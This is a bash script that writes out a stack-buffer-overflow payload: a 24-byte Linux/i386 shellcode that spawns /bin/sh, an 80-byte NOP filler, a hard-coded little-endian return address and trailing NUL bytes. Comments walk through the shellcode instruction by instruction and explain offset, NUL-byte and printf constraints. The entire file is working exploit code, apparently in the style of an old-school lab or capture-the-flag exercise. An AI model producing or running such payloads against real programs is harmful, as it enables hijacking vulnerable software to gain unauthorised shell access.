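#!/bin/bash
# Stack-overflow payload generator.  Writes to stdout:
#
#   [24 bytes shellcode][80 x NOP][RET, 4 bytes little-endian][4 x NUL]
#
# i.e. the 4-byte return address lands 104 bytes into the buffer, which is
# assumed to be where the target frame's saved return address sits —
# TODO confirm the offset against the vulnerable binary.
#
# Usage: ./exploit.sh [RET]
#   RET  return address as printf escapes, little-endian, e.g. '\xe8\xf8\xff\xbf'
#        for 0xbffff8e8 (the default).  It has to match the target's stack
#        layout; nothing runs unless it hits the first shellcode byte.
#
# Constraints to keep in mind before editing:
#   * The payload is presumably copied by a C string routine, so no byte up
#     to and including RET may be \x00.  The trailing NULs sit after RET and
#     only terminate the string.
#   * The NOP sled is *after* the shellcode, so it is filler up to RET, not a
#     landing zone: control must return to the exact start of the shellcode,
#     otherwise execution slides through the sled into the RET bytes.
#   * bash's printf is required: the '\xHH' escapes are a bash extension; a
#     POSIX /bin/sh such as dash prints them literally, which silently breaks
#     the payload (hence the bash shebang and 'printf %b').
set -eu

# Linux/i386 execve("//bin/sh", ["//bin/sh", NULL], NULL), 24 bytes, NUL-free.
#   \x31\xc0              xorl  %eax,%eax      eax = 0
#   \x50                  pushl %eax           string terminator
#   \x68\x6e\x2f\x73\x68  pushl $0x68732f6e    "n/sh"
#   \x68\x2f\x2f\x62\x69  pushl $0x69622f2f    "//bi"  -> "//bin/sh\0" on the stack
#   \x89\xe3              movl  %esp,%ebx      ebx = filename
#   \x99                  cltd                 edx = 0 (sign-extends eax) -> envp = NULL
#   \x52                  pushl %edx           argv terminator
#   \x53                  pushl %ebx           argv[0] = filename
#   \x89\xe1              movl  %esp,%ecx      ecx = argv
#   \xb0\x0b              movb  $0xb,%al       eax = 11 = SYS_execve, no NUL byte in the encoding
#   \xcd\x80              int   $0x80
readonly SHELLCODE='\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80'
readonly NOP_COUNT=80
readonly DEFAULT_RET='\xe8\xf8\xff\xbf'   # 0xbffff8e8 little-endian
readonly TRAILER='\x00\x00\x00\x00'       # after RET; never part of the copied string

#######################################
# Print the raw payload bytes.
# Arguments: $1 - return address as printf escapes (little-endian)
# Outputs:   shellcode + NOP sled + $1 + four NUL bytes, on stdout
#######################################
build_payload() {
  local ret=$1
  local sled='' i
  # Build the sled as escape text ("\x90" x NOP_COUNT); no perl needed.
  for ((i = 0; i < NOP_COUNT; i++)); do
    sled+='\x90'
  done
  # %b decodes the escapes but leaves any '%' in the data alone, which
  # using the payload itself as the format string would not.
  printf '%b' "${SHELLCODE}${sled}${ret}${TRAILER}"
}

main() {
  build_payload "${1:-$DEFAULT_RET}"
}

main "$@"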